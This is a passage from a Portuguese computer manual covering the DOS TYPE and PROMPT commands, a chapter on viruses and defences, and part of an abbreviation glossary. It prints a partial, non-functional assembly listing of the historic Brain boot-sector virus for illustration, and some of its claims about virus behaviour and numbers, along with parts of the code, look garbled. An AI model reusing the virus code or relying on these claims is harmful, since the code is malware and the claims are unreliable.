C:\>del carta.txt /p

 TYPE (interno)
Exibe no vídeo o conteúdo de um arquivo de texto.

299
Formato:
type [ud:][arq.ext]

Sendo:
ud: - unidade da qual se deseja saber o conteúdo de um arquivo;
arq.ext - o nome do arquivo tipo texto.

Detalhamento:
- o TYPE exibe na tela o conteúdo de um arquivo especificado na
linha de comando. Os arquivos de lote, texto ou documento, são exi-
bidos de forma legível. Os arquivos executáveis (já compilados), ou
gráficos, (.EXE, .COM, .SYS, etc.), são apresentados com caracteres
especiais.
- ctrl+p manda para a impressora ao mesmo tempo que para o vídeo;
- ctrl+s interrompe o rolamento da tela, uma nova tecla retoma o ro-
lamento. É o efeito semelhante ao da tecla pause;
- ctrl+c interrompe a exibição definitivamente, (o mesmo que
ctrl+break);
- shift+prtsc ou prtscr, manda para a impressora o que estiver Sendo
listado na tela;
- você pode também redirecionar a saída para a impressora, digitan-
do: type arq.ext > prn.

Exemplos:
C:\>type carta.txt (a listagem rola na tela)
C:\>type carta.txt > prn (a listagem sai na impressora)
C:\>type carta.txt | more (a listagem na tela, para a cada 25 linhas)

 PROMPT (interno)
Permite alterar a marca de pronto, (C:\>), do sistema operacional.

Formato:
prompt [dados]

Sendo:
dados - uma sequência de caracteres definida por você;
uma combinação de marcas dadas pelo sistema operacional;
um misto da duas alternativas acima.

300
Detalhamento:
Se não existir dados (o comando PROMPT for dado sem parâme-
tros), então a marca de pronto voltará a ser padrão: unidade corrente
seguida de caracter ">". Você pode combinar marcas oferecidas pelo
sistema operacional na forma: $m1 [$m2]...

Sendo:
$ - caracter indicador de marca padrão.
m1, m2, etc. - marcas padrão, da lista abaixo:

Marcas padrão:
$$ - o próprio cifrão;
$t - a hora;
$d - a data;
$p - o diretório corrente da unidade corrente;
$v - a versão do sistema operacional;
$n - a letra da unidade corrente (a:, b:, c:, ...)
$g - o caracter ">";
$l - o caracter "<";
$b - o caracter "|" (dois traços);
$q - o caracter "=";
$h - um retrocesso e apagamento do caracter anterior;
$e - o caracter ESCAPE;
$_ - a sequência CR LF (CARRIAGE RETURN e LINE FEED), faz ir
ao início da próxima linha.
Qualquer outro caracter após o $, é ignorado.

Exemplo:
C:\>prompt $e[s$e[0;73f$e[42;41mPC HELP$e[33;44m$e[K$_$e [u[
$p ] $e[1;33;44m
Esta sequência (digitada sem espaços) vai gerar, em vídeo colorido,
fundo azul com letras amarelas e o nome no canto direito da tela (que
inicia na coluna 73) com fundo vermelho e letras amarelas.

Vírus

No começo dos anos 80, quando o Brasil com atraso tomava conhe-
cimento da existência do vírus de computador, tudo parecia muito

301
engraçado, até se tomar consciência do poder de destruição. Aproxi-
madamente de 50 a 100 tipos diferentes de vírus são distribuídos no
mercado brasileiro a cada trimestre. Segundo a National Computer
Security Association surgem no mundo 6 novos tipos de vírus a cada
dia

Ainda hoje, apesar das vacinas existentes no mercado nacional, os


usuários de micro computadores ficam de cabelo em pé quando de-
tectam algum vírus entranhado no disco rígido o HD, HD externo ou
pen driver, etc.

De fato, alguns destes vírus são destrutivos e implacáveis, especial-


mente os que ocupam a área de boot, contudo, sempre existe uma
maneira de solucionar o problema.

Hardware não pensa

De fato, o hardware não pensa, o software faz por ele. Alguns fabri-
cantes de antivírus propõem a instalação, no micro computador, de
placas próprias para a detecção de vírus, mas a melhor solução é ter
cuidado e toda mídia, inclusive as placas antivírus, devem ser checa-
das. As probabilidade de uma placa antivírus ser instalada num micro
infectado e também ser contaminada são grandes. O que dá para se
fazer, e deve ser feito, é checar todos os periféricos antes de roda-los
em seu sistema, uma boa vacina antivírus atualizada é a solução
ideal, mas lembrem-se, entram no mercado brasileiro aproximada-
mente 50 a 100 tipos de vírus diferentes a cada trimestre, o que signi-
fica que no prazo de 3 meses qualquer vacina estará vencida e de
pouca valia se não for atualizada.

Vírus mutantes

Os mutantes, ou polimórficos, são uma geração de vírus que podem


atingir de 9000 a 65000 mutações, o que tornaria uma vacina quase
que ineficiente, mas as empresas fabricantes de vacinas antivírus já
possuem a solução.

302
O nome mais conhecido desta nova geração de mutantes é o Ameba
Maltesa (Maltese Amoeba), as vezes confundido com o Atenas, que
infecta arquivos .COM e .EXE.

Descoberto em setembro de 1991 na Irlanda, os principais sintomas


são: Falhas no boot, destrói os dados em HD, incha arquivos execu-
táveis, altera a memória do sistema, exibe mensagens, e pisca o
monitor de vídeo.

O Ameba ativa-se em 15 de março e 1 de novembro sobregravando


os primeiros 4 setores do cilindro 00 até 29, quando atingir os 30 ci-
lindros, pisca o monitor e ao reinicializar o sistema exibe mensagens,
o interessante neste vírus mutante é que não se tem notícias de que
infecte o arquivo command.com.

Descoberto em 2015 o vírus Romberti, é capaz de apagar todo o


disco rígido da vítima com o objetivo de se manter escondido.

Ele escreve um byte de dados aleatórios na memória 960 milhões de


vezes, o que causa demora e pode causar problemas na ferramenta
de sandbox, além de evitar que ferramentas de análise documentem
o comportamento preciso do vírus.

Criadores de vírus

"Os criadores desses programas de vírus são geniais". Esta era a


ideia primordial sobre as pessoas que tinham a criatividade, tempo e
conhecimento para tal, quando um vírus se chamava ping-pong e não
tinha poder de destruição, era um mero efeito de vídeo, apenas cha-
teava o operador, mais tarde o Cascata e outros seguiam o exemplo,
até que estes geniais criadores iniciaram a criação de vírus com po-
der de lesar um usuário de micro computador ou os dados de uma
empresa, criando o caos.

O código penal já prevê alguns destes crimes eletrônicos, passando o


genial criador a ser considerado como um criminoso qualquer.

303
Acreditava-se que vírus era coisa de usuário do DOS, mas hoje sabe-
se que não há imunidade para qualquer sistema operacional, redes
multiusuários ou mainframe.

Mecanismo de ação

Os vírus mais antigos costumam ocupar, no final dos 640 Kb de me-


mória RAM, os últimos 2 Kb onde estão alguns comandos residentes.
Os mais ressentes também pode se alojar na memória de vídeo, nos
buffers e no início da memória extendida.

Os antivírus quando detectam um vírus e removem na verdade os


mantém ativos na memória, a remoção é feita do arquivo infectado.
Após a operação de detecção é necessário desligar o computador
(Não usar o reset, mas efetivamente desligar), assim as memórias
RAM se apagam e destroem o infector.

Atualmente o mecanismo de ação das vacinas já não é o de procurar


pela "assinatura" do vírus mas sim pelo decriptor, porém o mecanis-
mo de ação do vírus é o de detectar a existência de um antivírus e
mudar sua criptografia. Assim, se um decriptor descompilado apre-
sentar uma linha como Let l=l, que não tem o menor significado, nu-
ma outra contaminação poderá mudar para Let j=j, que também não
tem o menor significado mas confunde o antivírus, tornado sua identi-
ficação bem mais complicada.

Existem antivírus no mercado que detectam um vírus e o cadastra


para posterior reconhecimento, mas com o advento dos vírus mutan-
tes este procedimento também passa a ser impraticável já que estes
podem assumir até 960 milhões de formas diferentes, o que incharia
o detector de vírus fazendo-o tomar praticamente metade de um HD,
e a decriptografia contendo uma série de caracteres coringa levaria a
constantes identificações e alarmes falsos.

Existiam até o final de janeiro de 1995 mais de 4662 tipos de vírus,


considerando-se inclusive as sua variações.

Atualmente os vírus de computador não seguem mais a premissa de


destruir os dados do usuário, seguem a linha de criptografar ou captu-

304
rar os dados, exigindo posterior “resgate”. Outros se alojam de forma
oculta, através de mensagens recebidas por e-mail.

Os mais conhecidos atualmente (2018):

Ransomware – CryBrazil, WannaCry (exigem pagamentos em Bitcoin


para restaurar os dados do usuário.

Malware – Rakhni - espalhado através de e-mails phishing com um


arquivo PDF em anexo, escolhe que tipo de golpe vai aplicar no seu
computador.

Spyware – normalmente associado aos Ransomware e Malware.

Phishing é um estilo antigo de fraude da Internet que usa e-mails


falsos, como avisos de bancos ou outras organizações.

Dentro do e-mail estão os links que o leitor pode clicar, levando-o


para uma página onde ele pode inserir os detalhes da sua conta.
Porém, esses links não vão para o site autêntico, mas para um lugar
onde os golpistas coletam os detalhes de login da vítima.

O que torna os ataques de phishing bem-sucedidos é que eles cos-


tumam usar os logotipos das organizações nos e-mails, fazendo com
que pareçam mensagens oficiais.

Como se proteger das ameaças

Faça inventário de todos os dispositivos


Faça e depois mantenha um inventário ativo de quais dispositivos
estão em sua rede em todos os momentos. É claro que isso é difícil
de fazer se os seus dispositivos de segurança, pontos de acesso e
dispositivos de rede não puderem se comunicar entre si. Como os
recursos de TI continuam se expandindo, uma solução NOC-SOC
integrada é uma abordagem valiosa, que garante a identificação e o
monitoramento de todos os dispositivos da rede.

Automatize as correções

305
A recente invasão do WannaCry deixou claro que os sistemas não
corrigidos continuam sendo a principal vítima de ataques e malwares.
É por isso que você deve desenvolver um processo para automatizar
seu processo de correção (patch).

Faça a segmentação da rede


O que você vai fazer quando sua rede for violada? Esta é uma per-
gunta que todo profissional de segurança precisa fazer. Porque
quando isso ocorrer, você quer limitar o impacto do evento o máximo
possível. A melhor linha de defesa é segmentar a rede. Sem a seg-
mentação adequada, os ransomworms podem se propagar facilmente
pela rede, até mesmo em backups, tornando a recuperação do seu
plano de resposta a incidentes (IR) muito mais difícil de implementar.

Acompanhe as ameaças
Assine os feeds de ameaças em tempo real para que seus sistemas
de segurança possam estar atentos aos ataques mais recentes.
Quando combinados à inteligência de ameaças locais por meio de
uma ferramenta centralizada de integração e correlação, como SIEM
ou serviço de inteligência de ameaças, os feeds de ameaças não
apenas ajudam as organizações a ver e responder melhor às amea-
ças assim que surgirem e não depois de você ter sido o alvo do ata-
que, como também ajudam a antecipá-las.

Observe os indicadores de comprometimento (IoCs - indicators


of compromise)
Quando você correlacionar o seu inventário às ameaças atuais, pode-
rá ver rapidamente quais dispositivos correm risco, e assim poderá
priorizar proteções, correções, isolamento ou a substituição.

Proteja dispositivos de usuários e pontos de acesso


Crie a regra exigindo que os dispositivos que chegam à sua rede
atendam aos requisitos básicos de segurança e a busca ativa por
dispositivos e tráfego sem correções ou infectados.

Implemente controles de segurança


Use soluções baseadas em comportamento e assinatura em toda a
sua rede para detectar e impedir ataques tanto na borda da rede
quanto depois de passarem pelas defesas de perímetro.

306
Use automação de segurança
Depois de ter bloqueado as áreas sobre as quais você tem controle,
aplique a automação ao número máximo possível de processos bási-
cos de segurança. Desta forma, você libera seus recursos de TI para
que se concentrem em tarefas de análise e resposta de ameaças de
ordem superior que podem proteger das ameaças mais avançadas
que visam a sua organização.

Faça backup dos sistemas críticos


A coisa mais importante em relação ao ransomware é fazer uma có-
pia dos dados e recursos críticos armazenados fora da rede para que
você possa restaurar e retomar as operações o quanto antes.

Crie um ambiente de segurança integrado


Para garantir que todas essas práticas de segurança sejam estendi-
das a cada novo ecossistema de rede online, você precisa implemen-
tar soluções de segurança totalmente integradas como um fabric de
segurança, para permitir coordenação e análise centralizadas.

Por dentro do vírus

Inadvertidamente ou deliberadamente os programas de vírus tem a


capacidade de autoclonagem e reprodução constante nos meios hos-
pedeiros, cujo objetivo é a destruição sem deixar rastros, a contami-
nação de um simples equipamento pessoal até um sofisticado e mili-
onário mainframe se dá via modem ou periféricos contaminados. O
que poucos sabem é que não só o software é afetado por estes pre-
dadores mas o próprio hardware, embora raramente, é destruído.

Imagine o que aconteceria com um sistema de tráfego aéreo contro-


lado por computadores, nos países com sistema de defesa computa-
dorizada, nos programas aeroespaciais ou até mesmo em automó-
veis com sistema de freio ou aceleração controlada por microproces-
sadores, seria o caos sem dúvida.

O pior é que os programas de vírus são tão fáceis de se fazer que


praticamente não exigem conhecimento específicos.

307
Veja, por exemplo, a dissecação do vírus PAKISTANI BRAIN efetua-
da pela Interpath Corporation (USA).

;-------------------------------------------------;
; VIRUS PAKISTANI BRAIN ;
;-------------------------------------------------;
CODE SEGMENT PUBLIC 'CODE'
ASSUME CD;CODE,DS:CODE,ES:CODE,SS:CODE
;
ORG 7C00H ;BOOT SECTOR ORG!
;
;-------------------------------------------------;
; ;
;-------------------------------------------------;
BEGIN: CLI ;
JMP CONTINUE ;7D4E
;
;-------------------------------------------------;
; DATA AREA ;
;-------------------------------------------------;
DB 34H,12H ;
;
;----------------------------------;
;THE FOLLOWING IS THE LOCATION OF THE VIRUS MAIN BODY WHICH RE-
SIDES INSIDE
;OF THE 3K BAD TRACK AREA. 512 BYTES OF BOOT SECTOR, 2.5K OF
VIRUS
L_HEAD DB 0 ;HEAD
L_TRACK_SECT LABEL WORD ;
DB 9 ;TRACK

DB 8 ;SECTOR
;
;------------------------------------;
; HEAD DB 7 ;USED BY READ_SECTOR
TRACK_SECT LABEL WORD ;USED BY READ_SECTOR
ETC.
SECTOR DB 1 ;
TRACK DB 7 ;
;
DB ' Welcome to the Dungeon'
DB '
DB ' (C) 1986 Basic $ Amjad (pvt) Ltd.'
DB ' BRAIN COMPUTER SERVICES...'
DB '730 NIZAM BLOCK ALLAMA IQBAL TOWN'
DB ' LAHORE-PAKISTAN...'
DB 'PHONE :430791,443248,280530.'
DB ' Bware of this VIRUS.....'

308
DB 'Contact us for vaccination..................'
DB '.$#@%$@!!'

;-------------------------------------------------;
; ;
;-------------------------------------------------;
CONTINUE: ;7D4E
MOV AX,CS ;
MOV DS,AX ;
MOV SS,AX ;
MOV SP,0F000H ;
STI ;
;
MOV AL,[L_HEAD] ;INITIALIZE
HEAD/TRACK/SECTOR

MOV [HEAD],AL ;
MOV CX,[L_TRACK_SECT] ;
CALL NEXT_SECTOR ;

MOV CX,5 ;READ MAIN BODY OF VIRUS INTO


MEMORY
MOV BX,offset BEGIN + 512 ; (5 SECTORS
LONG)
C_10: CALL READ_SECTOR ;
CALL NEXT_SECTOR ;
ADD BX,512 ;
LOOP C_10 ;
;
MOV AX,[0413H] ;0040:0014==MEMORY
SIZE
SUB AX,7 ;SUBSTRACT 7K !
MOV DS:[0413H],AX ;
;
MOV CL,6 ;MOVE OURSELF TO TOP OF MEMORY
SHL AX,CL ;
MOV ES,AX ;
MOV SI,offset BEGIN ;
MOV DI,0 ;
MOV CX,1004H ;MOVE 4K + 4 BYTES
CLD ;
REP MOVSB ;
;
PUSH ES ;JUMP TO US UP THERE

MOV AX,200H ;
PUSH AX ;
RETF ;
;

309
;-------------------------------------------------;
; READ A SECTOR ;
; ;
;ON ENTRY: ES:BX = DTA ;
;-------------------------------------------------;
READ_SECTOR: ;7D9C
PUSH CX ;
PUSH BX ;
;
MOV CX,4 ;RETRY COUNT = 4
RS_10: PUSH CX ;
MOV DH,[HEAD] ;
MOV DL,0 ;
MOV CX,[TRACK_SECT] ;
MOV AX,201H ;READ 1 SECTOR
INT 13H ;
JNB RS_90 ;JUMP ON ERROR
MOV AH,0 ;RESET
INT 13H ;
POP CX ;
LOOP RS_10 ;TRY AGAIN
INT 18H ;ELSE LOAD BASIC
;
RS_90: POP CX ;
POP BX ;
POP CX ;
RET ;
;

;-------------------------------------------------;
; INC. SECTOR AND OVER FLOW INTO HEAD & TRACK ;
;-------------------------------------------------;
NEXT_SECTOR: ;7DC0
MOV AL,[SECTOR] ;
INC AL ;
MOV [SECTOR],AL ;
CMP AL,10 ;
JNZ NS 90 ;
MOV DS:[SECTOR],1 ;
MOV AL,[HEAD] ;
INC AL ;
MOV [HEAD],AL ;
CMP AL,2 ;
JNZ NS_90 ;
MOV DS:[HEAD]:0 ;
INC DS:[TRACK] ;
NS_90: RET ;
;

310
;-------------------------------------------------;
; ;
;-------------------------------------------------;
CODE EMDS ;
END BEGIN ;

Por motivos óbvios, a listagem é apenas parcial e, por si só, inofensi-


va.

O vírus Pakistani Brain foi criado para "pegar" apenas em driver de


discos flexíveis, o Floppy. Sua ação é ativada quando acionado o
processo de reset via teclado (CTRL+ALT+DEL), a interrupção INT
09H, ao que fica ativo para contaminar qualquer disquete no drive A.

Você deve estar se perguntado em que data cada um deles exerce


sua ação destrutiva. Propositadamente deixei de fazer menção a
datas porque estas são extremamente variadas, o que tomaria um
espaço desnecessário, assim, alguns vírus atacam aos domingos,
outros com dias marcados no ano, outros aleatoriamente, outros com
um dia certo, outros em quinzenas, outros em determinados dias da
semana e outros todos os dias. Assim conclui que é melhor ter em
mente que "TODO DIA É DIA DE VÍRUS".

Algumas abreviaturas

ADSL - Assimetric Digital Subscriber Line - Tecnologia de acesso


rápido que usa a linha de telefonia comum. A principal característiaca
é deixar a linha de telefonia disponível para o canal de voz. Para o
ADSL convencional, as taxas mínimas de download começam em
256 kbit/s, e geralmente atingem 9 Mbit/s dentro de 300 metros da
central aonde está instalado o sistema. As taxas podem chegar a 52
Mbit/s dentro de 100 metros (o tão chamado VDSL). Taxas de upload
começam em 64 kbit/s e geralmente atingem 256 kbit/s mas podem ir
até 768 kbit/s. O nome ADSL Lite é as vezes usado para versões
mais lentas.

AGP - Acelerated Graphics Port - Barramento de dados extremamen-


te rápido usado pela placa de vídeo. Normalmente aparece como um
slot marrom na placa mãe.

311
API - Aplication Program Interface - Aplicativo de interface de pro-
grama.

APM - Advanced Power Management - Sistema avançado de geren-


ciamento de energia que permite diminuir o consumo elétrico do
computador. útil sobretudo em micros portáteis.

ASC American Standard Code - Tabela ou sistema de caracteres


posteriormente substituído pelos ASCII.

ASCII - American Standard Code for Information Interchange - É um


conjunto de códigos para o computador representar números, letras,
pontuação e outros caracteres. Surgido em 1961, um dos seus inven-
tores foi Robert W. Bemer. ASCII é aquela na qual os únicos elemen-
tos utilizados são os caracteres disponíveis no teclado do computa-
dor. ASCII é uma padronização da indústria de computadores, onde
cada carácter é manipulado na memória discos etc, sob forma de
código binário. O código ASCII é formado por todas as combinações
possíveis de 8 bits, sendo que existem várias extensões que abran-
gem 8 ou mais bits.

ASP - Active Server Pages - é uma estrutura de programação em


Script que se utiliza de VBScript, JScript, PerlScript ou Python pro-
cessadas pelo lado servidor para geração de conteúdo dinâmico na
Web. Roda nativamente em servidores Windows, através do serviço
chamado de IIS (Internet Information Service) - o servidor web da
Microsoft, ou do PWS (Personal Web Server) em ambientes com
Windows. Além disso ele pode rodar em outras plataformas, como
Linux no servidor Apache quando usando um Módulo de um progra-
ma como o Tomcat. Linguagem de programação para a Internet.

AT - Advanced Tecnology - Era o 286 lançado pela IBM em 84.

ATX - Advanced Tecnology X - O padrão para as placas e gabinetes


modernos, prevê medidas definidas para as placas mães, gabinetes e
modificações na fonte de alimentação.

312
BBS - Bulletin Board System - Os primeiros serviços online, bem
antes da Internet. A conexão era feita via modem, na época ainda
modelos de 1200 ou 2400 bips.

BIOS - Basic Input Output System - Normalmente é um chip respon-


sável por "dar a partida" no micro. Contém os dados de inicialização e
informações do computador.

BPS - Bits Per Second - Bits por segundo, é a medida (capacidade)


de envio de dados via modem ou rede.

CAD Computer-Aided Design - Sistema de desenho eletrônico nor-


malmente usado por projetistas de todas as categorias

CD-ROM - Compact Disc - Ready Only Memory - Disco compacto de


gravação que não pode ser regravado.

CISC - Complex Instruction Set Computer - Computadores que exe-


cutam diretamente um conjunto complexo de instruções, como o 486.
Os processadores atuais incorporam um núcleo RISC (Reduced Ins-
truction Set Computer), sendo chamados de híbridos.

CMOS - Complementary Metal Oxide Semiconductor - Memória volá-


til, alimentado por uma bateria, usado para gravar as configurações
do Setup.

CMYK - Cyan, Magenta, Yellow e Black - Sistema universal de cores


com Azul, Magenta ou Vermelho, Amarelo e Preto. São cores básicas
que misturadas na proporção certa reproduzem milhões de cores.

CPU - Central Processing Unit - Era mais usado na época dos main-
frames. Atualmente o termo CPU é utilizado para fazer referência ao
gabinete de um computador, mas CPU é processador da placa mãe.

CRT - Cathode Ray Tube - O tubo de raios catódicos (o mesmo que


TRC) é o monitor de vídeo comum, tanto do computador como da TV,
hoje quase em desuso substituído pelo de cristal líquido.

313
DDR - Double Data Rate - Um tipo de memória duas vezes mais rápi-
do que as memórias SDRAM.

DDR2, 3, 4, ... - Double Data Rate geração 2, 3, 4, ... - Evolução da


DDR.

DIMM - Double Inline Memory Mode - Os módulos de memória de


168 vias atualmente ainda em uso em computadores mais antigos.

DMA - Direct Memory Access - Recurso da placa mãe que permite


que os periféricos acessem diretamente a memória RAM, sem con-
sumir poder de processamento do processador.

DNS - Domain Name Service - Transforma os endereços IP em no-


mes amigáveis, como: www.guiadohardware.net, pode ser usado
também em Intranets.

DOS - Disk Operating System - Sistema Operacional em Disco, em


qualquer sistema operacional, mas é normalmente usado em relação
ao MS-DOS.

DPI - Dots Per Inch - Pontos por polegadas, é o sistema de visualiza-


ção em vídeo ou impressão composto por pontos.

DVD - Digital Versatile Discs - Sistema de armazenamento de dados


semelhante ao CD-ROM, mas com maior capacidade, sendo atual-
mente usado para armazenar filmes ou dados.

ECP - Extended Capabilities Port - é o padrão atualmente usado para


a porta da Impressora, bem mais rápido que os padrões anteriores,
tanto em paralela como em USB.

EDORAM - Extended Data Output dynamic Ramdom Access Memory


- Evolução das memórias FPM, usada principalmente em micros Pen-
tium antigos.

EPP - Enhanced Parallel Port - Padrão de porta paralela anterior ao


ECP, tem a mesma velocidade, mas não suporta DMA.

314
EULA - End User License Agreement - É o contrato aceito antes de
instalar os programas, deve ser lido com atenção antes de ser aceito.

FAQ - Frequently Asked Questions - As perguntas mais comuns so-


bre algum tema. Para ler antes de perguntar.

FAT - File Allocation Table - Tabela de alocação de arquivos num HD


onde fica armazenada a lista dos endereços ocupados por cada ar-
quivo guardado, permitindo sua localização.

FDD - Floppy Disk Drive - é o driver de disquetes, (antigos 5 1/4 e os


atuais 3 1/2 polegadas). Tem tendência a desaparecerem com o uso
de outros tipos de acessórios.

FTP - File Transfer Protocol - Protocolo de Transferência de Arquivos,


é uma forma bastante rápida e versátil de transferir arquivos (também
conhecidos como ficheiros), sendo uma das mais usadas na internet.

HDD - Hard Disk Driveé o disco rígido do computador, também co-


nhecido como HD. Ou Winchester.

HSB - Hue Saturation BrillanceSaturação de brilho da matriz.

HTML - Hyper Text Markup Language - Linguagem de Marcação de


Hipertexto, é uma linguagem de marcação utilizada para produzir
páginas na Web. Documentos HTML podem ser interpretados por
navegadores. A tecnologia é fruto do "casamento" dos padrões
HyTime e SGML. Uma linguagem de formatação de texto desenvolvi-
da nos primórdios da Internet, mas padrão até hoje.

HTTP - Hyper Text Transfer Protocol - Protocolo de Transferência de


Hipertexto, é um protocolo da camada de "Aplicação" do modelo OSI,
utilizado para transferência de dados na World Wide Web. Esse é o
protocolo da World Wide Web (www). O mesmo transfere dados de
hiper-midia (imagens, sons e textos). Algumas de suas características
são: geralmente este protocolo, utiliza a porta 80 e é usado para a
comunicação de "sites". Este comunica na linguagem HTML (Hiper-
text Markup Language), contudo para haver comunicação, com o
servidor do "site", teremos de utilizar comandos proprios do mesmo,

315
os quais não são em HTML. Foi desenvolvido originalmente para
transferir páginas HTML, mas também é usado para outros tipos de
arquivo. Este protocolo é usado no acesso ás páginas WEB. Veja o
exemplo:
http://www.pcpinformatica.com/.

IDE - Integrated Device Electronics - É um Barramento de dados que


serve para a conexão entre a placa mãe e os periféricos tais como o
disco rígido, CD-ROM e outros dispositivos.

IRQ - Interrupt ReQuest channel - É um endereço destinado ao uso


de cada dispositivo para transferir dados ou instruções para o proces-
sador. Existem apenas 16 IRQs nos micros PC e dois dispositivos
não podem usar o mesmo endereço.

ISA - Industry Standard Architeture - É um padrão de barramento


desenvolvido para os micros 286, nas nova placas mãe já não é mais
usado.

ISDN - Integrated Services Digital Network - Permite acessar a Inter-


net a 128 K usando a linha telefônica. Pouco usado por causa das
altas tarifas.

ISP - Internet Service ProviderSistema provedor de serviços de inter-


net, é o que normalmente abreviamos de "provedor", sejam eles pa-
gos ou gratuitos.

LAN - Local Area Network - Qualquer rede de micros utilizada para


acesso a Internet, normalmente uma sala para jogos em rede ou
mesmo um prédio com computadores domésticos.

LBA - Logical Block Addressing - Um método de tradução que permi-


te ao BIOS reconhecer HDs com mais de 528 MB. Suportado por
todas as placas mães atuais.

LCD - Liquid Crystal Display - Display de crystal liquido. São as telas


usadas nas calculadoras, celulares, notebooks e hoje muito difundi-
das em monitores de computadores e televisores.

316
MAC - Macintosh Computer - Desenvolvido pela Apple, Foi em 84 o
primeiro micro doméstico a usar interface gráfica e modem. A arquite-
tura continua evoluindo até hoje, sendo a principal concorrente dos
micros PC.

MBR - Master Boot Record - é a chamada trilha zero do HD, onde


ficam guardadas as informações sobre o(s) sistema(s) operacionais
instalados e o próprio índice dos arquivos existentes no HD.

MIDI - Musical Interface Digital Interface - Interface Digital para Ins-


trumentos Musicais, é uma tecnologia padronizada de comunicação
entre instrumentos musicais e equipamentos eletrônicos (teclados,
guitarras, sintetizadores, sequenciadores, computadores, samplers
etc), possibilitando que uma composição musical seja executada,
transmitida ou manipulada por qualquer dispositivo que reconheça
esse padrão. Tecnicamente, MIDI é um protocolo; entretanto, o termo
geralmente é utilizado também para se referir aos diversos compo-
nentes do sistema, como adaptadores, conectores, arquivos, cabos
etc.

MMORPG - Massively Multiplayer Online Role Playing Game - Um


jogo de interpretação online e massivo para múltiplos jogadores
(Massively ou Massive Multiplayer Online Role-Playing Game ou Multi
massive online Role-Playing Game) ou MMORPG é um jogo de com-
putador e/ou video game que permite a milhares de jogadores cria-
rem personagens em um mundo virtual dinâmico ao mesmo tempo na
Internet. MMORPGs são um subtipo dos Massively Multiplayer Online
Game (Jogos Online Massivos para Múltiplos Jogadores). é um novo
sistema utilizado para jogos em rede online, atualmente bastante
difundido, pode-se dizer que é um substituto do conhecido RPG.

MMX - MuiliMedia eXtensions ou Multiple Math ou Matrix Math eX-


tension - Microprocessadores projetados pela Intel e introduzido em
1997 nos processadores Pentium, mais tarde também foi utilizados
por outros fabricantes.

MP3 - MPEG Layer 3 - Padrão de compactação de áudio que permite


que as músicas fiquem com 1/10 do tamanho original sem uma de-
gradação muito grande da qualidade.

317
MODEM - MODulador e DEModulador - Sistema de transmissão de
dados utilizado no mundo inteiro, necessita de um aparelho (modem)
para modular a transmissão de dados em alta velocidade e demodu-
lar na recepção.

MPEG - Motion Picture Experts Group - Padrão de compactação de


áudio e imagem que permite que fiquem com uma redução de tama-
nho sem uma degradação expressiva da qualidade.

MSDOS - MicroSoft Disk Operating System - Antigo sistema operaci-


onal desenvolvido pela IBM (IBMDOS), mais tarde teve seus direitos
adquiridos pela MicroSoft e passou a ser conhecido como MSDOS.
Não possuía interface amigável como o Windows, os comandos eram
digitados diretamente no teclado e raros programas aceitavam o
mouse, foi literalmente substituído pelo Windows.

NLQ - Near Letter Quality - Sistema de alta qualidade de impressão


gráfica utilizado em impressoras. é bastante expressivo nas impres-
soras matriciais.

NTFS - N T File System - Sistema de arquivos usado pelos sistemas


operacionais Windows NT e Windows 2000 por oferecer uma veloci-
dade maior de acesso aos dados gravados.

OEM - Original Equipment Manufacturer - Identificação de Fabricante


de Equipamento original. é um termo que se refere a uma situação na
qual uma companhia compra um produto fabricado de outra compa-
nhia e revende o produto como seu próprio, porém, há confusão so-
bre se OEM se refere &agrave; companhia que compra o produto e
revende, ou a companhia que originalmente fabrica o produto.

OS - Operational System - é o Sistema Operacional do computador


ou de qualquer outro aparelho que assim o exija, sem o qual o equi-
pamento não tem funcionalidade.

PC - Personal Computer - O mesmo que CP, é o computador pesso-


al, pode ser um noteboock ou um computador comum de mesa. O

318
primeiro PC foi lançado pela IBM em 81. Depois vieram os XT, 286,
386, 486, etc. Até chegar nos dias de hoje.

PCI - Peripheral Component Interconnect - O padrão de barramento


para periféricos atual, usado pela maioria dos dispositivos relaciona-
dos com a informática.

PnP - Plug and Play - Também conhecido pelos mais céticos por
"encaixe e reze", a ideia é permitir que novos periféricos sejam auto-
maticamente reconhecidos e instalados, sem a interferência do usuá-
rio.

POP - Post Office Protocol - Protocolo de transmissão de dados via


MODEM, utilizado no acesso remoto a uma caixa de correio eletrôni-
co. O POP3 está definido no RFC 1225 e permite que todas as men-
sagens contidas numa caixa de correio eletrônico possam ser transfe-
ridas sequencialmente para um computador local. Aí, o utilizador po-
de ler as mensagens recebidas, apagá-las, responder-lhes, armaze-
na-las, etc.

RAM - Randomic Access Memory - Memória de acesso aleatório, é a


memória mais usada não apenas em micros PCs, mas na maioria dos
computadores. é barata, mas tem a desvantagem de ser volátil ou
seja, quando o equipamento é desligado ela não armazena dados.

RGB - Red, Green e Blue - Sistema de cores gerados pelos tubos de


raios catódicos conhecidos como TRC ou CRT (monitores de vídeo e
televisores). As cores Vermelho, Verde e Azul, dosadas em quantida-
des específicas, geram milhões de cores. Os monitores LCD também
utilizam esta geração de cores.

RIMM - Rambus Inline Memory Mode - Um padrão de memórias ultra


rápido e ultra caro desenvolvido pela Rambus Inc. que a Intel insiste
em tentar empurrar junto com seus processadores.

RISC - Reduced Instruction Set Computer - Computadores que são


capazes de executar poucas instruções diferentes, sendo em com-
pensação extremamente rápidos.

319
ROM - Read Only Memory - Memória somente para leitura, normal-
mente consiste de um chip onde ficam gravadas as informações que
não podem ser alteradas. Como exemplo cito a BIOS dos computado-
res. Existem vários tipos, usada para guardar dados que não precisa-
rão ser alterados.

RPG - Role Playing Game - Do inglês Role Playing Game (Jogo de


Interpretação de Papéis), é um jogo de estratégia e imaginação, em
que os jogadores interpretam diferentes personagens em diferentes
mundos, vivendo aventuras e superando desafios de acordo com as
regras descritas no sistema escolhido. é o atual sistema de jogos
online muito difundido nas Lan house mas gradativamente sendo
substituído pelo MMORPG.

SCSI - Small Computer System Interface - Um padrão de barramento


para a conexão de discos rígidos, CD-ROMs, scanners, impressoras
e vários outros dispositivos. Desenvolvido originalmente pela Apple
para uso nos MACs. Pouco difundido para o sistema IBM, hoje caiu
em desuso, tendo como substituto o sistema SATA.

SIMM - Single In-line Memory Modules - São os módulos de memória


de 72 vias usados até pouco tempo atrás.

SMTP - Simple Mail Transfer Protocol - A utilização em massa remota


aos anos 80, é um protocolo relativamente simples, baseado em texto
simples, em que um ou vários destinatários de uma mensagem são
especificados (e, na maioria dos casos, validados), sendo depois a
mensagem transferida. Este protocolo corre sobre a porta 25 numa
rede TCP. A resolução DNS de um servidor SMTP de um dado domí-
nio é possibilitada pela entrada MX <I>(Mail eXchange)</I>.

SSD - Solid-State Drive é uma nova tecnologia de armazenamento


considerada a evolução do disco rígido (HD). Ele não possui partes
